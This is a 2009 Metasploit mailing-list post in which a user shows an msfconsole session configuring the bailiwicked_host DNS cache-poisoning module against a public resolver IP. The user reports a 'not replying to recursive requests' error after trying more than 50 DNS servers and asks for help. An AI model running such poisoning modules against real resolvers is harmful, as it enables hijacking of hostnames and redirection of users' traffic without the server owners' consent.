Metasploit mailing list archives

about dns cache poisoning


From: gt1cjh at gmail.com (zhaoj)
Date: Fri, 15 May 2009 14:53:57 +0800

Hi, everybody

I 'm use the metasploit version 3.2 .

when I try to test dns cache poisoning and set all information just
like following but always get an error.

##################################################################################
msf > use auxiliary/spoof/dns/bailiwicked_host
msf auxiliary(bailiwicked_host) > set RHOST 123.129.192.41
RHOST => 123.129.192.41
msf auxiliary(bailiwicked_host) > set SRCPORT 0
SRCPORT => 0
msf auxiliary(bailiwicked_host) > show options

Module options:

   Name      Current Setting    Required  Description
   ----      ---------------    --------  -----------
   HOSTNAME  pwned.example.com  yes       Hostname to hijack
   NEWADDR   1.3.3.7            yes       New address for hostname
   RECONS    208.67.222.222     yes       The nameserver used for
reconnaissance
   RHOST     123.129.192.41     yes       The target address
   SRCADDR   Real               yes       The source address to use
for sending the queries (accepted: Real, Random)
   SRCPORT   0                  yes       The target server's source
query port (0 for automatic)
   TTL       31093              yes       The TTL for the malicious
host entry
   XIDS      0                  yes       The number of XIDs to try
for each query (0 for automatic)

msf auxiliary(bailiwicked_host) > check

[*] Using the Metasploit service to verify exploitability...
[*] ERROR: This server is not replying to recursive requests
msf auxiliary(bailiwicked_host) >
#####################################################################################

I try to set more than 50 dns server to RHOST,but always failed.

anybody can tell me why? or the bug is  fixed on all of dns server?



Best Regards!


Current thread: